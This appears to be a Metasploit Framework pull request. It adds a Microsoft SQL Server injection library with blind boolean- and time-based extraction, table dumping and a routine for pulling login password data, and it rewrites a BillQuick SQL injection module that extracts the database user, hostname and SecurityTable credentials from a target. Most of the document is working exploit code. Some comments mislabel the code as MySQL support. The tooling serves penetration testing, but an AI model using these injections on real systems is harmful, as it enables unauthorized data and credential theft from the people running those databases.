### PR TITLE
Microsoft SQL Server injection support + BillQuick SQLi module update

### DIFF
--- a/lib/msf/core/exploit/sqli/mssqli.rb
+++ b/lib/msf/core/exploit/sqli/mssqli.rb
@@ -1,0 +1,2 @@
+module Msf::Exploit::SQLi::Mssqli
+end

--- a/lib/msf/core/exploit/sqli/mssqli/boolean_based_blind.rb
+++ b/lib/msf/core/exploit/sqli/mssqli/boolean_based_blind.rb
@@ -1,0 +1,16 @@
+#
+#   Boolean-Based Blind SQL injection support for MySQL
+#
+class Msf::Exploit::SQLi::Mssqli::BooleanBasedBlind < Msf::Exploit::SQLi::Mssqli::Common
+  include Msf::Exploit::SQLi::BooleanBasedBlindMixin
+
+  #
+  # This method checks if the target is vulnerable to Blind boolean-based injection by checking that
+  # the values returned by the bloc for some boolean queries are correct.
+  #
+  def test_vulnerable
+    out_true = blind_request('1=1')
+    out_false = blind_request('1=2')
+    out_true && !out_false
+  end
+end

--- a/lib/msf/core/exploit/sqli/mssqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mssqli/common.rb
@@ -1,0 +1,300 @@
+# coding: ascii-8bit
+
+require 'base64'
+#
+# This class represents a Microsoft SQL Server Injection object, its primary purpose is to provide the common queries
+# needed when performing SQL injection.
+# Instanciate it only if you get the query results of your SQL injection returned on the response.
+#
+module Msf::Exploit::SQLi::Mssqli
+  class Common < Msf::Exploit::SQLi::Common
+    #
+    # Encoders supported by Microsoft SQL Server
+    # Keys are MSSQL function names, values are decoding procs in Ruby
+    #
+    ENCODERS = {
+      hex: {
+        encode: 'master.dbo.fn_varbintohexstr(CAST(^DATA^ as varbinary(max)))',
+        decode: proc { |data| Rex::Text.hex_to_raw(data.start_with?('0x') ? data[2..-1] : data) }
+      }
+    }.freeze
+
+    #
+    #   See SQLi::Common#initialize
+    #
+    def initialize(datastore, framework, user_output, opts = {}, &query_proc)
+      opts[:concat_separator] ||= ','
+      if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
+        # if it's a String or a Symbol, use a predefined encoder if it exists
+        opts[:encoder] = opts[:encoder].downcase.intern
+        opts[:encoder] = ENCODERS[opts[:encoder]] if ENCODERS[opts[:encoder]]
+      end
+      super
+    end
+
+    #
+    #   Query the Microsoft SQL Server version
+    #   @return [String] The Microsoft SQL Server version in use
+    #
+    def version
+      call_function('@@VERSION')
+    end
+
+    #
+    #   Query the current database name
+    #   @return [String] The name of the current database
+    #
+    def current_database
+      call_function('DB_NAME()')
+    end
+
+    #
+    #   Query the hostname
+    #   @return [String] The hostname of the server running Microsoft SQL Server
+    #
+    def hostname
+      call_function('@@SERVERNAME')
+    end
+
+    #   Query the current user
+    #   @return [String] The username of the current user
+    #
+    def current_user
+      call_function('user_name()')
+    end
+
+    #
+    #   Query the names of all the existing databases
+    #   @return [Array] An array of Strings, the database names
+    #
+    def enum_database_names
+      dump_table_fields('master..sysdatabases', %w[name]).flatten
+    end
+
+    #
+    #   Query the names of the tables in a given database
+    #   @param database [String] the name of a database, or nil or an empty string for the current database
+    #   @return [Array] An array of Strings, the table names in the given database
+    #
+    def enum_table_names(database = '')
+      sysobjects_tbl = "#{database.nil? || database.empty? ? '' : database + '..'}sysobjects"
+      dump_table_fields(sysobjects_tbl, %w[name], "xtype='U'").flatten
+    end
+
+    def enum_view_names(database = '')
+      sysobjects_tbl = "#{database.nil? || database.empty? ? '' : database + '..'}sysobjects"
+      dump_table_fields(sysobjects_tbl, %w[name], "xtype='V'").flatten
+    end
+
+    #
+    # Query the mssql users (their username and password), this might require root privileges.
+    # @return [Array] an array of arrays representing rows, where each row contains two strings, the username and password
+    #
+    def enum_dbms_users
+      # might require root privileges
+      dump_table_fields('master..syslogins', %w[name password])
+    end
+
+    #
+    #   Query the column names of the given table in the given database
+    #   @param table_name [String] the name of the table of which you want to query the column names, can be: database.table
+    #   @return [Array] An array of Strings, the column names in the given table belonging to the given database
+    #
+    def enum_table_columns(table_name)
+      table_schema_condition = ''
+      if table_name.include?('.')
+        database, table_name = table_name.split(/\.{1,2}/)
+        database += '..'
+      else
+        database = ''
+      end
+      dump_table_fields("#{database}syscolumns", %w[name],
+                        "id=(select id from #{database}sysobjects where name='#{table_name}')").flatten
+    end
+
+    #
+    #  Query the given columns of the records of the given table, that satisfy an optional condition
+    #  @param table [String]  The name of the table to query
+    #  @param columns [Array] The names of the columns to query
+    #  @param condition [String] An optional condition, return only the rows satisfying it
+    #  @param num_limit [Integer] An optional maximum number of results to return
+    #  @return [Array] An array, where each element is an array of strings representing a row of the results
+    #
+    def dump_table_fields(table, columns, condition = '', num_limit = 0)
+      return '' if columns.empty?
+
+      one_column = columns.length == 1
+      column_names = columns
+
+      if one_column
+        columns = "cast(isnull(#{columns.first},'#{@null_replacement}') as varchar(max))"
+        columns = @encoder[:encode].sub(/\^DATA\^/, columns) if @encoder
+      else
+        columns = columns.map do |col|
+          col = "cast(isnull(#{col},'#{@null_replacement}') as varchar(max))"
+          @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
+        end.join("+'#{@second_concat_separator}'+")
+      end
+      unless condition.empty?
+        condition = ' where ' + condition
+      end
+      num_limit = num_limit.to_i
+      limit = num_limit > 0 ? ' top ' + num_limit.to_s : ''
+      retrieved_data = nil
+      identifier_generator = Rex::RandomIdentifier::Generator.new
+      if @safe
+        # no group_concat, leak one row at a time
+        count_item = 'cast(count(1) as varchar(max))'
+        count_item = @encoder ? @encoder[:encode].sub(/\^DATA\^/, count_item) : count_item
+        row_count = run_sql("select #{count_item} from #{table}#{condition}")
+        row_count = @encoder ? @encoder[:decode].call(row_count).to_i : row_count.to_i
+        num_limit = row_count if num_limit == 0 || row_count < num_limit
+        # generate a random alias for every column name
+        item_alias, row_alias, tab_alias = 3.times.map { identifier_generator.generate }
+        retrieved_data = num_limit.times.map do |current_row|
+          if @truncation_length
+            truncated_query("select top(1) substring(#{item_alias},^OFFSET^,#{@truncation_length}) from (select #{columns} #{item_alias},ROW_NUMBER() over (order by (select 1)) #{row_alias} from #{table}#{condition}) #{tab_alias} where #{row_alias}=#{current_row + 1}")
+          else
+            run_sql("select top(1) #{item_alias} from (select #{columns} #{item_alias},ROW_NUMBER() over (order by (select 1)) #{row_alias} from #{table}#{condition}) #{tab_alias} where #{row_alias}=#{current_row + 1}")
+          end
+        end
+      elsif num_limit > 0
+        # if limit > 0, an alias will be necessary
+        alias1, alias2 = 2.times.map { identifier_generator.generate }
+        if @truncation_length
+          retrieved_data = truncated_query("select substring(string_agg(#{alias1}, '#{@concat_separator}')," \
+          "^OFFSET^,#{@truncation_length}) from (select #{limit}#{columns} #{alias1} from #{table}"\
+          "#{condition}) #{alias2}").split(@concat_separator || ',')
+        else
+          retrieved_data = run_sql("select string_agg(#{alias1},'#{@concat_separator}')"\
+          " from (select #{limit}#{columns} #{alias1} from #{table}#{condition}) #{alias2}").split(@concat_separator || ',')
+        end
+      elsif @truncation_length
+        retrieved_data = truncated_query("select #{limit}substring(string_agg(#{columns},'#{@concat_separator}')," \
+          "^OFFSET^,#{@truncation_length}) from #{table}#{condition}").split(@concat_separator || ',')
+      else
+        retrieved_data = run_sql("select #{limit}string_agg(#{columns},'#{@concat_separator}')" \
+        " from #{table}#{condition}").split(@concat_separator || ',')
+      end
+
+      retrieved_data.map do |row|
+        row = row.split(@second_concat_separator)
+        @encoder ? row.map { |x| @encoder[:decode].call(x) } : row
+      end
+    end
+
+    #
+    # Checks if the target is vulnerable (if the SQL injection is working fine), by checking that
+    # queries that should return known results return the results we expect from them
+    #
+    def test_vulnerable
+      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
+      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
+      run_sql("select '#{random_string}'") == random_string
+    end
+
+    #
+    # Attempt writing data to the file at the given path
+    #
+    def write_to_file(fpath, data)
+      run_sql("select '#{data}' into dumpfile '#{fpath}'")
+    end
+
+    private
+
+    #
+    #  Helper method used in cases where the response is truncated.
+    #  @param query [String] The SQL query to execute, where ^OFFSET^ will be replaced with an integer offset for querying
+    #  @return [String] The query result
+    #
+    def truncated_query(query)
+      result = [ ]
+      offset = 1
+      loop do
+        slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
+        offset += @truncation_length # should be same as @truncation_length for most cases
+        result << slice
+        vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
+        print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
+        break if slice.length < @truncation_length
+      end
+      result.join
+    end
+
+    #
+    # Checks the options specific to Microsoft SQL Server (if any)
+    #
+    def check_opts(opts)
+      unless opts[:encoder].nil? || opts[:encoder].is_a?(Hash) || ENCODERS[opts[:encoder].downcase.intern]
+        raise ArgumentError, 'Unsupported encoder'
+      end
+
+      super
+    end
+
+    def call_function(function)
+      function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
+      output = nil
+      if @truncation_length
+        output = truncated_query("select substring(#{function},^OFFSET^,#{@truncation_length})")
+      else
+        output = run_sql("select #{function}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
+    def blind_detect_length(query, timebased)
+      if_function = ''
+      sleep_part = ''
+      if timebased
+        if_function = 'if(' + if_function
+        sleep_part += ") waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'"
+      end
+      i = 0
+      output_length = 0
+      loop do
+        output_bit = blind_request("#{if_function}cast(datalength(cast((#{query}) as varchar(max))) as bigint)&cast(#{1 << i} as bigint)=0#{sleep_part}")
+        output_length |= (1 << i) unless output_bit
+        i += 1
+        stop = blind_request("#{if_function}cast(datalength(cast((#{query}) as varchar(max))) as bigint)/cast(#{1 << i} as bigint)=0#{sleep_part}")
+        break if stop
+      end
+      output_length
+    end
+
+    def blind_dump_data(query, length, known_bits, bits_to_guess, timebased)
+      if_function = ''
+      sleep_part = ''
+      if timebased
+        if_function = 'if(' + if_function
+        sleep_part += ") waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'"
+      end
+      output = length.times.map do |j|
+        current_character = known_bits
+        bits_to_guess.times do |k|
+          # the query below: the inner substr returns a character from the result, the outer returns a bit of it
+          output_bit = blind_request("#{if_function}ascii(substring(cast((#{query}) as varchar(max)), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
+          current_character |= (1 << k) unless output_bit
+        end
+        current_character.chr
+      end.join
+      output
+    end
+
+    #
+    #  Encodes strings in the query string as hexadecimal numbers
+    #
+    def hex_encode_strings(query)
+      # for more encoding capabilities, run code at the beginning of your block
+      query.gsub(/'.*?'|".*?"/) do |match|
+        str = match[1..-2]
+        if str.empty?
+          "left(char(#{rand(0..255)}),0)"
+        else
+          str.each_codepoint.map { |code| "char(#{code})" }.join('+')
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/sqli/mssqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mssqli/common.rb
@@ -4,7 +4,7 @@ require 'base64'
 #
 # This class represents a Microsoft SQL Server Injection object, its primary purpose is to provide the common queries
 # needed when performing SQL injection.
-# Instanciate it only if you get the query results of your SQL injection returned on the response.
+# Instantiate it only if you get the query results of your SQL injection returned on the response.
 #
 module Msf::Exploit::SQLi::Mssqli
   class Common < Msf::Exploit::SQLi::Common
@@ -123,23 +123,15 @@ module Msf::Exploit::SQLi::Mssqli
     def dump_table_fields(table, columns, condition = '', num_limit = 0)
       return '' if columns.empty?
 
-      one_column = columns.length == 1
-      column_names = columns
-
-      if one_column
-        columns = "cast(isnull(#{columns.first},'#{@null_replacement}') as varchar(max))"
-        columns = @encoder[:encode].sub(/\^DATA\^/, columns) if @encoder
-      else
-        columns = columns.map do |col|
-          col = "cast(isnull(#{col},'#{@null_replacement}') as varchar(max))"
-          @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
-        end.join("+'#{@second_concat_separator}'+")
-      end
+      columns = columns.map do |col|
+        col = "cast(isnull(#{col},'#{@null_replacement}') as varchar(max))"
+        @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
+      end.join("+'#{@second_concat_separator}'+")
       unless condition.empty?
         condition = ' where ' + condition
       end
       num_limit = num_limit.to_i
-      limit = num_limit > 0 ? ' top ' + num_limit.to_s : ''
+      limit = num_limit > 0 ? " top #{num_limit}" : ''
       retrieved_data = nil
       identifier_generator = Rex::RandomIdentifier::Generator.new
       if @safe

--- a/lib/msf/core/exploit/sqli/mssqli/time_based_blind.rb
+++ b/lib/msf/core/exploit/sqli/mssqli/time_based_blind.rb
@@ -1,0 +1,17 @@
+#
+#   Time-Based Blind SQL injection support for MySQL
+#
+class Msf::Exploit::SQLi::Mssqli::TimeBasedBlind < Msf::Exploit::SQLi::Mssqli::Common
+  include ::Msf::Exploit::SQLi::TimeBasedBlindMixin
+
+  #
+  # This method checks if the target is vulnerable to Blind time-based injection by checking if
+  # the target sleeps only when a given condition is true.
+  #
+  def test_vulnerable
+    # run_sql and check if output is what's expected, or just check for delays?
+    out_true = blind_request("if(1=1) waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'")
+    out_false = blind_request("if(1=2) waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'")
+    out_true && !out_false
+  end
+end

--- a/modules/auxiliary/gather/billquick_txtid_sqli.rb
+++ b/modules/auxiliary/gather/billquick_txtid_sqli.rb
@@ -136,7 +136,9 @@ class MetasploitModule < Msf::Auxiliary
     sqli = create_sqli(dbms: Msf::Exploit::SQLi::Mssqli::Common, opts: { safe: true, encoder: { encode: "'#{header}'+^DATA^+'#{footer}'", decode: ->(x) { x[/#{header}(.+?)#{footer}/mi, 1] } } }) do |payload|
       int = Rex::Text.rand_text_numeric(4)
       res = inject("'+(select '' where #{int} in (#{payload}))+'", viewstate, viewstategenerator, eventvalidation)
-      error_info(res)[/\\u0027(.+?)\\u0027/m, 1]
+      err_info = error_info(res)
+      print_error('Unexpected output from the server') if err_info.nil?
+      err_info[/\\u0027(.+?)\\u0027/m, 1]
     end
 
     # all inject strings taken from sqlmap runs, using error page method

--- a/modules/auxiliary/gather/billquick_txtid_sqli.rb
+++ b/modules/auxiliary/gather/billquick_txtid_sqli.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
+  include Msf::Exploit::SQLi
 
   def initialize(info = {})
     super(
@@ -75,13 +76,8 @@ class MetasploitModule < Msf::Auxiliary
     Rex::Text.rand_text_alpha(len)
   end
 
-  def char_list(string)
-    ('char(' + string.split('').map(&:ord).join(')+char(') + ')').to_s
-  end
-
   def error_info(body)
-    /BQEShowModalAlert\('Information','(?<error>[^']+)/ =~ body
-    error
+    body[/BQEShowModalAlert\('Information','([^']+)/, 1]
   end
 
   def inject(content, state, generator, validation)
@@ -127,9 +123,6 @@ class MetasploitModule < Msf::Auxiliary
 
     header = rand_chars
     footer = rand_chars
-    header_char = char_list(header)
-    footer_char = char_list(footer)
-    int = Rex::Text.rand_text_numeric(4)
 
     service = {
       address: rhost,
@@ -140,24 +133,23 @@ class MetasploitModule < Msf::Auxiliary
     }
     report_service(service)
 
-    # all inject strings taken from sqlmap runs, using error page method
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND CHARINDEX(CHAR(49)+CHAR(53)+CHAR(46)+CHAR(48)+CHAR(46),@@VERSION)>0)+'", viewstate, viewstategenerator, eventvalidation)
-    /, table \\u0027(?<table>.+?)\\u0027/ =~ error_info(res)
-    print_good("Current Database: #{table.split('.').first}")
-    report_note(host: rhost, port: rport, type: 'database', data: table.split('.').first)
+    sqli = create_sqli(dbms: Msf::Exploit::SQLi::Mssqli::Common, opts: { safe: true, encoder: { encode: "'#{header}'+^DATA^+'#{footer}'", decode: ->(x) { x[/#{header}(.+?)#{footer}/mi, 1] } } }) do |payload|
+      int = Rex::Text.rand_text_numeric(4)
+      res = inject("'+(select '' where #{int} in (#{payload}))+'", viewstate, viewstategenerator, eventvalidation)
+      error_info(res)[/\\u0027(.+?)\\u0027/m, 1]
+    end
 
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 1325 IN (SELECT (#{header_char}+(SELECT SUBSTRING((ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<banner>.+?)\\u0027/ =~ error_info(res)
-    banner.slice!(header)
-    banner.slice!(footer)
-    banner = banner.gsub('\n', "\n").gsub('\t', "\t")
+    # all inject strings taken from sqlmap runs, using error page method
+    database = sqli.current_database
+    print_good("Current Database: #{database}")
+    report_note(host: rhost, port: rport, type: 'database', data: database)
+
+    banner = sqli.version.gsub('\n', "\n").gsub('\t', "\t")
     print_good("Banner: #{banner}")
 
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 8603 IN (SELECT (#{header_char}+(SELECT SUBSTRING((ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<user>.+?)\\u0027/ =~ error_info(res)
-    user.slice!(header)
-    user.slice!(footer)
+    user = sqli.current_user
     print_good("DB User: #{user}")
+
     credential_data = {
       origin_type: :service,
       module_fullname: fullname,
@@ -167,25 +159,15 @@ class MetasploitModule < Msf::Auxiliary
     }.merge(service)
     create_credential(credential_data)
 
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 7555 IN (SELECT (#{header_char}+(SUBSTRING((ISNULL(CAST(@@SERVERNAME AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<hostname>.+?)\\u0027/ =~ error_info(res)
-    hostname.slice!(header)
-    hostname.slice!(footer)
+    hostname = sqli.hostname
     print_good("Hostname: #{hostname}")
 
-    report_host(host: rhost, name: hostname, info: banner.gsub('\n', "\n").gsub('\n', "\n"), os_name: OperatingSystems::WINDOWS)
+    report_host(host: rhost, name: hostname, info: banner, os_name: OperatingSystems::WINDOWS)
 
-    sec_table = "#{table.split('.')[0...-1].join('.')}.SecurityTable"
-
-    # get user count from SecurityTable
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 8815 IN (SELECT (#{header_char}+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<user_count>.+?)\\u0027/ =~ error_info(res)
-    user_count.slice!(header)
-    user_count.slice!(footer)
-    print_good("User Count in #{sec_table}: #{user_count}")
+    sec_table = sqli.dump_table_fields("#{database}.dbo.SecurityTable", %w[EmployeeID Settings], 'ModuleID=0')
 
     table = Rex::Text::Table.new(
-      'Header' => sec_table,
+      'Header' => "#{database}.dbo.SecurityTable",
       'Indent' => 1,
       'SortIndex' => -1,
       'Columns' =>
@@ -195,22 +177,7 @@ class MetasploitModule < Msf::Auxiliary
       ]
     )
 
-    (1..user_count.to_i).each do |index|
-      # username
-      # select EmployeeID from test.dbo.SecurityTable where ModuleID=0
-      res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 2292 IN (SELECT (#{header_char}+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM #{sec_table} WHERE ModuleID=0 AND ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP #{index - 1} ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0 ORDER BY EmployeeID) ORDER BY EmployeeID)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-      /\\u0027(?<username>.+?)\\u0027/ =~ error_info(res)
-      username.slice!(header)
-      username.slice!(footer)
-      print_good("Username: #{username}")
-
-      # settings
-      # select Settings from test.dbo.SecurityTable where ModuleID=0
-      res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 7411 IN (SELECT (#{header_char}+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(Settings AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM #{sec_table} WHERE ModuleID=0 AND ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP #{index - 1} ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0 ORDER BY EmployeeID) ORDER BY EmployeeID)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-      /\\u0027(?<settings>.+?)\\u0027/ =~ error_info(res)
-      settings.slice!(header)
-      settings.slice!(footer)
-      print_good("User #{username} settings: #{settings}")
+    sec_table.each do |(username, settings)|
       table << [username, settings]
       credential_data = {
         origin_type: :service,


### PR DESCRIPTION
This PR adds support for Microsoft SQL server injection to the SQL injection library that is part of Metasploit Framework.

New improvements:
- In safe mode (where `string_agg` is not used), I've updated it to use `ROW_NUMBER()` instead of a fetch statement, to retrieve one row at a time, wider compatibility.


Simplification of the `billquick_txtid_sqli` module:
- Before: 227 LoC   --> 195
- Greatly simplified SQLi logic (it's very convenient to dump another table, or run any other SQL query).
- a cool use for encoders, the `header` and `footer` values are added as in the original module.

## Verification

- Verify that the `billquick_txtid_sqli` still works.
- I've been testing the different features I implemented, including truncated queries, safe (and unsafe) modes, encoders, blind injections, everything seems to work fine, but I'll report / try to fix any issue I come across. I'll add a vulnerable demo app for testing soon.

## Known inconsistencies

Time-based queries use the `IF(CONDITION) WAITFOR DELAY ...` expression, this means that the payload must be used as a stacked query, not in a condition (as in MySQL and others). From what I read, stacked queries often work with MSSQL, but having the ability to use heavy queries would be a plus (I think for every DBMS), I'm not sure how useful that would be, but as an option, I might add it later.

Apart from that, I think the library works fine.

## Todo

- ~~Use `rex-random_identifier` instead of `Rex::Text.rand_text_alpha` to generate aliases.~~
- Add the feature for reading files,  using stacked queries, as sqlmap does it (`BULK INSERT ... FROM '...' WITH (CODEPAGE='RAW', FIELDTERMINATOR='...', ROWTERMINATOR='...')`.
- Update `test_vulnerable` to encode and decode the test string, necessary if an encoder needs to be used. This has to be updated for the other dbms also.